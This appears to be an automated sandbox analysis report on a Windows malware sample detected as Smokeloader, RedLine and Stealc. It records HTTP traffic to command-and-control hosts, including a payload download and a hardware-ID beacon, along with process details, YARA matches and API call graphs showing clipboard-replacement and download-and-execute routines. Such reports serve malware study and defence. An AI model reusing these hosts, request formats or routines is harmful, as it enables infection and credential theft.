Oct 26, 2024 18:58:18.723166943 CEST  85                 OUT        GET /ScreenUpdateSync.exe HTTP/1.1
                                                                                  User-Agent: ShareScreen
                                                                                  Host: 176.113.115.37
Oct 26, 2024 18:58:19.631794930 CEST  1236               IN         HTTP/1.1 200 OK
                                                                                  Date: Sat, 26 Oct 2024 16:58:19 GMT
                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                  Last-Modified: Sat, 26 Oct 2024 16:45:02 GMT
                                                                                  ETag: "62400-62563f4f86bc9"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 402432
                                                                                  Content-Type: application/x-msdos-program


Session ID:1
Source IP:192.168.2.4
Source Port:49732
Destination IP:62.204.41.177
Destination Port:80
PID:7404
Process:C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe

Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 18:58:25.393450975 CEST | 88 | OUT | GET / HTTP/1.1
  Host: 62.204.41.177
  Connection: Keep-Alive
  Cache-Control: no-cache
Oct 26, 2024 18:58:26.274070024 CEST | 203 | IN | HTTP/1.1 200 OK
  Date: Sat, 26 Oct 2024 16:58:26 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Content-Length: 0
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
Oct 26, 2024 18:58:26.668085098 CEST | 419 | OUT | POST /edd20096ecef326d.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIEC
  Host: 62.204.41.177
  Content-Length: 219
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Ascii (multipart body, line breaks restored from the CRLF bytes of the raw data):
    ------KJEHJKJEBGHJJKEBGIEC
    Content-Disposition: form-data; name="hwid"

    985EFFAB68083674480464
    ------KJEHJKJEBGHJJKEBGIEC
    Content-Disposition: form-data; name="build"

    default9_cap
    ------KJEHJKJEBGHJJKEBGIEC--
Oct 26, 2024 18:58:28.019727945 CEST | 210 | IN | HTTP/1.1 200 OK
  Date: Sat, 26 Oct 2024 16:58:26 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Content-Length: 8
  Keep-Alive: timeout=5, max=99
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8
  Data Raw: 59 6d 78 76 59 32 73 3d
  Data Ascii: YmxvY2s= (base64 of "block")


Session ID:0
Source IP:192.168.2.4
Source Port:49730
Destination IP:104.21.56.70
Destination Port:443
PID:7288
Process:C:\Users\user\Desktop\jicQJ2cdlM.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-26 16:58:17 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
  User-Agent: ShareScreen
  Host: post-to-me.com
2024-10-26 16:58:18 UTC | 781 | IN | HTTP/1.1 200 OK
  Date: Sat, 26 Oct 2024 16:58:18 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/5.4.16
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lu7vCWjykJrsdM9EQ%2BeRT4wDcuj%2Fb2VcOQlbJimhTV4kUSV1WIgKtDU6bMjmLg%2Bfo2T%2F%2F4zvWCkZp8K5kqeZPOAS0khiqeGMHHogsjJg8%2Bq2tSCApYfTVbgmtUOhDEyMkA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8d8bfd84e9714632-DFW
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1244&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=728&delivery_rate=2625566&cwnd=242&unsent_bytes=0&cid=68090397425893b3&ts=506&x=0"
2024-10-26 16:58:18 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
  Data Ascii: 2\r\nok\r\n (chunked-encoding chunk of length 2 carrying "ok")
2024-10-26 16:58:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0\r\n\r\n (terminating zero-length chunk)



                                                                                  Target ID:0
                                                                                  Start time:12:58:12
                                                                                  Start date:26/10/2024
                                                                                  Path:C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\jicQJ2cdlM.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:480'256 bytes
                                                                                  MD5 hash:C26C0C92EF5AD707C6F9DD37B2C016AE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:1
                                                                                  Start time:12:58:20
                                                                                  Start date:26/10/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:402'432 bytes
                                                                                  MD5 hash:085DE763171FBBAFEAC2CDB972AACC2A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 34%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:12:58:27
                                                                                  Start date:26/10/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 1132
                                                                                  Imagebase:0x930000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:2.2%
                                                                                    Dynamic/Decrypted Code Coverage:3.8%
                                                                                    Signature Coverage:5.8%
                                                                                    Total number of Nodes:738
                                                                                    Total number of Limit Nodes:21
64562->64572 64567 43348a _free 20 API calls 64568 43ca88 64567->64568 64571 43cab1 LeaveCriticalSection __wsopen_s 64568->64571 64569->64555 64570->64561 64571->64561 64573 43f984 64572->64573 64574 43f96d 64572->64574 64575 43f9a3 64573->64575 64576 43f98c 64573->64576 64642 42eae9 20 API calls __dosmaperr 64574->64642 64646 434fca 10 API calls 2 library calls 64575->64646 64644 42eae9 20 API calls __dosmaperr 64576->64644 64580 43f972 64643 42a5bd 26 API calls _Deallocate 64580->64643 64581 43f991 64645 42a5bd 26 API calls _Deallocate 64581->64645 64582 43f9aa MultiByteToWideChar 64585 43f9d9 64582->64585 64586 43f9c9 GetLastError 64582->64586 64648 4336c7 21 API calls 3 library calls 64585->64648 64647 42eab3 20 API calls __dosmaperr 64586->64647 64589 43d001 64589->64568 64596 43d05c 64589->64596 64590 43f9e1 64591 43fa09 64590->64591 64592 43f9e8 MultiByteToWideChar 64590->64592 64594 43348a _free 20 API calls 64591->64594 64592->64591 64593 43f9fd GetLastError 64592->64593 64649 42eab3 20 API calls __dosmaperr 64593->64649 64594->64589 64597 43d079 64596->64597 64598 43d0a7 64597->64598 64599 43d08e 64597->64599 64650 43979e 64598->64650 64664 42ead6 20 API calls __dosmaperr 64599->64664 64602 43d093 64665 42eae9 20 API calls __dosmaperr 64602->64665 64603 43d0ac 64604 43d0b5 64603->64604 64605 43d0cc 64603->64605 64666 42ead6 20 API calls __dosmaperr 64604->64666 64663 43cd2a CreateFileW 64605->64663 64609 43d0ba 64667 42eae9 20 API calls __dosmaperr 64609->64667 64610 43d182 GetFileType 64613 43d1d4 64610->64613 64614 43d18d GetLastError 64610->64614 64612 43d157 GetLastError 64669 42eab3 20 API calls __dosmaperr 64612->64669 64672 4396e7 21 API calls 2 library calls 64613->64672 64670 42eab3 20 API calls __dosmaperr 64614->64670 64615 43d105 64615->64610 64615->64612 64668 43cd2a CreateFileW 64615->64668 64619 43d19b CloseHandle 64619->64602 64622 43d1c4 64619->64622 64621 43d14a 64621->64610 64621->64612 64671 42eae9 20 API calls __dosmaperr 64622->64671 
64624 43d1f5 64628 43d241 64624->64628 64673 43cf3b 169 API calls 3 library calls 64624->64673 64625 43d1c9 64625->64602 64630 43d26e 64628->64630 64674 43cadd 167 API calls 4 library calls 64628->64674 64629 43d267 64629->64630 64631 43d27f 64629->64631 64675 4335ed 29 API calls 2 library calls 64630->64675 64633 43d029 64631->64633 64634 43d2fd CloseHandle 64631->64634 64633->64567 64676 43cd2a CreateFileW 64634->64676 64636 43d328 64637 43d332 GetLastError 64636->64637 64638 43d277 64636->64638 64677 42eab3 20 API calls __dosmaperr 64637->64677 64638->64633 64640 43d33e 64678 4398b0 21 API calls 2 library calls 64640->64678 64642->64580 64643->64589 64644->64581 64645->64589 64646->64582 64647->64589 64648->64590 64649->64591 64651 4397aa BuildCatchObjectHelperInternal 64650->64651 64679 42e40d EnterCriticalSection 64651->64679 64653 4397b1 64655 4397d6 64653->64655 64659 439844 EnterCriticalSection 64653->64659 64661 4397f8 64653->64661 64683 43957d 21 API calls 3 library calls 64655->64683 64657 4397db 64657->64661 64684 4396c4 EnterCriticalSection 64657->64684 64658 439821 __wsopen_s 64658->64603 64659->64661 64662 439851 LeaveCriticalSection 64659->64662 64680 4398a7 64661->64680 64662->64653 64663->64615 64664->64602 64665->64633 64666->64609 64667->64602 64668->64621 64669->64602 64670->64619 64671->64625 64672->64624 64673->64628 64674->64629 64675->64638 64676->64636 64677->64640 64678->64638 64679->64653 64685 42e455 LeaveCriticalSection 64680->64685 64682 4398ae 64682->64658 64683->64657 64684->64661 64685->64682 64686 43412a 64687 434136 BuildCatchObjectHelperInternal 64686->64687 64688 434142 64687->64688 64689 434159 64687->64689 64720 42eae9 20 API calls __dosmaperr 64688->64720 64699 42cb1f EnterCriticalSection 64689->64699 64692 434147 64721 42a5bd 26 API calls _Deallocate 64692->64721 64693 434169 64700 4341a6 64693->64700 64696 434175 64722 43419c LeaveCriticalSection __fread_nolock 64696->64722 64698 434152 __wsopen_s 64699->64693 64701 4341b4 
64700->64701 64702 4341ce 64700->64702 64733 42eae9 20 API calls __dosmaperr 64701->64733 64723 432928 64702->64723 64705 4341d7 64730 4347f3 64705->64730 64706 4341b9 64734 42a5bd 26 API calls _Deallocate 64706->64734 64709 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64709->64696 64711 4342db 64713 4342e8 64711->64713 64716 43428e 64711->64716 64712 43425f 64715 43427c 64712->64715 64712->64716 64736 42eae9 20 API calls __dosmaperr 64713->64736 64735 4344bf 31 API calls 4 library calls 64715->64735 64716->64709 64737 43433b 30 API calls 2 library calls 64716->64737 64718 434286 64718->64709 64720->64692 64721->64698 64722->64698 64724 432934 64723->64724 64725 432949 64723->64725 64738 42eae9 20 API calls __dosmaperr 64724->64738 64725->64705 64727 432939 64739 42a5bd 26 API calls _Deallocate 64727->64739 64729 432944 64729->64705 64740 434670 64730->64740 64732 4341f3 64732->64709 64732->64711 64732->64712 64733->64706 64734->64709 64735->64718 64736->64709 64737->64709 64738->64727 64739->64729 64741 43467c BuildCatchObjectHelperInternal 64740->64741 64742 434684 64741->64742 64743 43469c 64741->64743 64775 42ead6 20 API calls __dosmaperr 64742->64775 64745 434750 64743->64745 64750 4346d4 64743->64750 64780 42ead6 20 API calls __dosmaperr 64745->64780 64746 434689 64776 42eae9 20 API calls __dosmaperr 64746->64776 64749 434755 64781 42eae9 20 API calls __dosmaperr 64749->64781 64765 4396c4 EnterCriticalSection 64750->64765 64753 43475d 64782 42a5bd 26 API calls _Deallocate 64753->64782 64754 4346da 64756 434713 64754->64756 64757 4346fe 64754->64757 64766 434775 64756->64766 64777 42eae9 20 API calls __dosmaperr 64757->64777 64760 434703 64778 42ead6 20 API calls __dosmaperr 64760->64778 64761 434691 __wsopen_s 64761->64732 64762 43470e 64779 434748 LeaveCriticalSection __wsopen_s 64762->64779 64765->64754 64783 439941 64766->64783 64768 434787 64769 4347a0 SetFilePointerEx 64768->64769 64770 43478f 64768->64770 64772 434794 64769->64772 64773 4347b8 
GetLastError 64769->64773 64796 42eae9 20 API calls __dosmaperr 64770->64796 64772->64762 64797 42eab3 20 API calls __dosmaperr 64773->64797 64775->64746 64776->64761 64777->64760 64778->64762 64779->64761 64780->64749 64781->64753 64782->64761 64784 43994e 64783->64784 64785 439963 64783->64785 64798 42ead6 20 API calls __dosmaperr 64784->64798 64789 439988 64785->64789 64800 42ead6 20 API calls __dosmaperr 64785->64800 64788 439953 64799 42eae9 20 API calls __dosmaperr 64788->64799 64789->64768 64790 439993 64801 42eae9 20 API calls __dosmaperr 64790->64801 64793 43995b 64793->64768 64794 43999b 64802 42a5bd 26 API calls _Deallocate 64794->64802 64796->64772 64797->64772 64798->64788 64799->64793 64800->64790 64801->64794 64802->64793 64803 4023ba 64804 402581 PostQuitMessage 64803->64804 64805 4023ce 64803->64805 64809 40257f 64804->64809 64806 4023d5 DefWindowProcW 64805->64806 64807 4023ec 64805->64807 64806->64809 64808 402a14 167 API calls 64807->64808 64807->64809 64808->64809 64810 40fc2b 64811 40fc37 BuildCatchObjectHelperInternal 64810->64811 64839 410018 64811->64839 64813 40fc3e 64814 40fd91 64813->64814 64819 40fc68 64813->64819 64860 4104f3 4 API calls 2 library calls 64814->64860 64816 40fd98 64861 42ffe9 28 API calls _Atexit 64816->64861 64818 40fd9e 64862 42ff9b 28 API calls _Atexit 64818->64862 64827 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64819->64827 64854 42fd0e 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64819->64854 64822 40fc81 64824 40fc87 64822->64824 64855 42fcb2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64822->64855 64823 40fda6 64826 40fd08 64850 41060d 64826->64850 64827->64826 64856 42a386 167 API calls 4 library calls 64827->64856 64830 40fd0e 64831 40fd23 64830->64831 64857 410643 GetModuleHandleW 64831->64857 64833 40fd2a 64833->64816 64834 40fd2e 64833->64834 64835 40fd37 64834->64835 64858 42ff8c 28 API calls _Atexit 64834->64858 64859 4101a7 13 
API calls 2 library calls 64835->64859 64838 40fd3f 64838->64824 64840 410021 64839->64840 64863 41079b IsProcessorFeaturePresent 64840->64863 64842 41002d 64864 428847 10 API calls 3 library calls 64842->64864 64844 410032 64845 410036 64844->64845 64865 4317c1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64844->64865 64845->64813 64847 41003f 64848 41004d 64847->64848 64866 428870 8 API calls 3 library calls 64847->64866 64848->64813 64867 426850 64850->64867 64853 410633 64853->64830 64854->64822 64855->64827 64856->64826 64857->64833 64858->64835 64859->64838 64860->64816 64861->64818 64862->64823 64863->64842 64864->64844 64865->64847 64866->64845 64868 410620 GetStartupInfoW 64867->64868 64868->64853 64869 402bcd RegCreateKeyExW 64870 402bfb RegSetValueExW 64869->64870 64871 402c0f 64869->64871 64870->64871 64872 402c14 RegCloseKey 64871->64872 64873 402c1d 64871->64873 64872->64873 64874 4332fe 64875 43330b 64874->64875 64879 433323 64874->64879 64924 42eae9 20 API calls __dosmaperr 64875->64924 64877 433310 64925 42a5bd 26 API calls _Deallocate 64877->64925 64880 43337e 64879->64880 64888 43331b 64879->64888 64926 434ced 21 API calls 2 library calls 64879->64926 64882 432928 __fread_nolock 26 API calls 64880->64882 64883 433396 64882->64883 64894 432e36 64883->64894 64885 43339d 64886 432928 __fread_nolock 26 API calls 64885->64886 64885->64888 64887 4333c9 64886->64887 64887->64888 64889 432928 __fread_nolock 26 API calls 64887->64889 64890 4333d7 64889->64890 64890->64888 64891 432928 __fread_nolock 26 API calls 64890->64891 64892 4333e7 64891->64892 64893 432928 __fread_nolock 26 API calls 64892->64893 64893->64888 64895 432e42 BuildCatchObjectHelperInternal 64894->64895 64896 432e62 64895->64896 64897 432e4a 64895->64897 64899 432f28 64896->64899 64904 432e9b 64896->64904 64993 42ead6 20 API calls __dosmaperr 64897->64993 65000 42ead6 20 API calls __dosmaperr 64899->65000 64900 432e4f 
64994 42eae9 20 API calls __dosmaperr 64900->64994 64902 432f2d 65001 42eae9 20 API calls __dosmaperr 64902->65001 64906 432eaa 64904->64906 64907 432ebf 64904->64907 64995 42ead6 20 API calls __dosmaperr 64906->64995 64927 4396c4 EnterCriticalSection 64907->64927 64909 432eb7 65002 42a5bd 26 API calls _Deallocate 64909->65002 64911 432ec5 64913 432ee1 64911->64913 64914 432ef6 64911->64914 64912 432eaf 64996 42eae9 20 API calls __dosmaperr 64912->64996 64997 42eae9 20 API calls __dosmaperr 64913->64997 64928 432f49 64914->64928 64916 432e57 __wsopen_s 64916->64885 64920 432ee6 64998 42ead6 20 API calls __dosmaperr 64920->64998 64921 432ef1 64999 432f20 LeaveCriticalSection __wsopen_s 64921->64999 64924->64877 64925->64888 64926->64880 64927->64911 64929 432f73 64928->64929 64930 432f5b 64928->64930 64932 4332dd 64929->64932 64937 432fb8 64929->64937 65012 42ead6 20 API calls __dosmaperr 64930->65012 65030 42ead6 20 API calls __dosmaperr 64932->65030 64933 432f60 65013 42eae9 20 API calls __dosmaperr 64933->65013 64936 4332e2 65031 42eae9 20 API calls __dosmaperr 64936->65031 64938 432f68 64937->64938 64940 432fc3 64937->64940 64944 432ff3 64937->64944 64938->64921 65014 42ead6 20 API calls __dosmaperr 64940->65014 64941 432fd0 65032 42a5bd 26 API calls _Deallocate 64941->65032 64943 432fc8 65015 42eae9 20 API calls __dosmaperr 64943->65015 64947 43300c 64944->64947 64948 433032 64944->64948 64949 43304e 64944->64949 64947->64948 64983 433019 64947->64983 65016 42ead6 20 API calls __dosmaperr 64948->65016 65019 4336c7 21 API calls 3 library calls 64949->65019 64951 433037 65017 42eae9 20 API calls __dosmaperr 64951->65017 64953 433065 64956 43348a _free 20 API calls 64953->64956 64959 43306e 64956->64959 64957 43303e 65018 42a5bd 26 API calls _Deallocate 64957->65018 64958 4331b7 64961 43322d 64958->64961 64964 4331d0 GetConsoleMode 64958->64964 64962 43348a _free 20 API calls 64959->64962 64963 433231 ReadFile 64961->64963 64965 433075 64962->64965 64966 4332a5 
GetLastError 64963->64966 64967 43324b 64963->64967 64964->64961 64968 4331e1 64964->64968 64969 43309a 64965->64969 64970 43307f 64965->64970 64971 4332b2 64966->64971 64979 433209 64966->64979 64967->64966 64972 433222 64967->64972 64968->64963 64973 4331e7 ReadConsoleW 64968->64973 65022 43480e 64969->65022 65020 42eae9 20 API calls __dosmaperr 64970->65020 65028 42eae9 20 API calls __dosmaperr 64971->65028 64986 433270 64972->64986 64987 433287 64972->64987 64988 433049 __fread_nolock 64972->64988 64973->64972 64978 433203 GetLastError 64973->64978 64974 43348a _free 20 API calls 64974->64938 64978->64979 64979->64988 65025 42eab3 20 API calls __dosmaperr 64979->65025 64981 433084 65021 42ead6 20 API calls __dosmaperr 64981->65021 64982 4332b7 65029 42ead6 20 API calls __dosmaperr 64982->65029 65003 43d385 64983->65003 65026 432c65 31 API calls 2 library calls 64986->65026 64987->64988 64989 43329e 64987->64989 64988->64974 65027 432aa5 29 API calls __fread_nolock 64989->65027 64992 4332a3 64992->64988 64993->64900 64994->64916 64995->64912 64996->64909 64997->64920 64998->64921 64999->64916 65000->64902 65001->64909 65002->64916 65004 43d392 65003->65004 65005 43d39f 65003->65005 65033 42eae9 20 API calls __dosmaperr 65004->65033 65008 43d3ab 65005->65008 65034 42eae9 20 API calls __dosmaperr 65005->65034 65007 43d397 65007->64958 65008->64958 65010 43d3cc 65035 42a5bd 26 API calls _Deallocate 65010->65035 65012->64933 65013->64938 65014->64943 65015->64941 65016->64951 65017->64957 65018->64988 65019->64953 65020->64981 65021->64988 65023 434775 __fread_nolock 28 API calls 65022->65023 65024 434824 65023->65024 65024->64983 65025->64988 65026->64988 65027->64992 65028->64982 65029->64988 65030->64936 65031->64941 65032->64938 65033->65007 65034->65010 65035->65007

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 004016EA
• Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
  • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
• OpenClipboard.USER32(00000000), ref: 00401721
• GetClipboardData.USER32(00000001), ref: 00401731
• GlobalLock.KERNEL32(00000000), ref: 00401740
• _strlen.LIBCMT ref: 0040174D
• _strlen.LIBCMT ref: 0040177C
• _strlen.LIBCMT ref: 004018C0
• EmptyClipboard.USER32 ref: 004018D6
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
• GlobalLock.KERNEL32(00000000), ref: 00401901
• GlobalUnlock.KERNEL32(00000000), ref: 0040190D
• SetClipboardData.USER32(00000001,00000000), ref: 00401916
• GlobalFree.KERNEL32(00000000), ref: 0040191D
• CloseClipboard.USER32 ref: 00401941
• Sleep.KERNEL32(000002C7), ref: 0040194C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: i
• API String ID: 1583243082-3865851505
• Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
• Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
• Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
• Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D

Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
• InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
• GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
• CloseHandle.KERNEL32(00000000), ref: 00402B27
• ShellExecuteExW.SHELL32(?), ref: 00402B88
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
• CloseHandle.KERNEL32(?), ref: 00402BA9
• InternetCloseHandle.WININET(00000000), ref: 00402BB2
• InternetCloseHandle.WININET(00000000), ref: 00402BB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: .exe$<$ShareScreen
• API String ID: 3323492106-493228180
• Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
• Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
• Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
• Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007FA276
• Module32First.KERNEL32(00000000,00000224), ref: 007FA296
Memory Dump Source
• Source File: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7f9000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: e7fb7523b8803fe30d3d9a9553e2399dbc976e6eb7a07e132c1604f41b1245bb
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: E1F06275200718BBD7202BF5988DB7A77E8BF89724F100529F746D12C0DB79EC454A62
Memory Dump Source
• Source File: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7f9000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd0bb62a69ec7605012e64fce1928872f0838fcd369f9a9d4524d6f5a1ea6748
• Instruction ID: 7d5e278c5d6dbdba4e1c46090711187a2bf961df14eec7574d7aa88d6bd66561
• Opcode Fuzzy Hash: cd0bb62a69ec7605012e64fce1928872f0838fcd369f9a9d4524d6f5a1ea6748
• Instruction Fuzzy Hash: 50A2419684E7C85FEB239B341C6A6A13F70AE23214B0E44DBC6D5CF2A3E14C5919D727

Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                    • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                    • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69

                                                                                    Control-flow Graph: rendered graph not recoverable from the report text; first basic block at 0x43d05c, API calls in graph: GetFileType, GetLastError, CloseHandle
                                                                                    APIs
                                                                                      • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                    • GetLastError.KERNEL32 ref: 0043D170
                                                                                    • __dosmaperr.LIBCMT ref: 0043D177
                                                                                    • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                                                    • GetLastError.KERNEL32 ref: 0043D18D
                                                                                    • __dosmaperr.LIBCMT ref: 0043D196
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                                                    • CloseHandle.KERNEL32(?), ref: 0043D300
                                                                                    • GetLastError.KERNEL32 ref: 0043D332
                                                                                    • __dosmaperr.LIBCMT ref: 0043D339
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                    • String ID:
                                                                                    • API String ID: 4237864984-0
                                                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
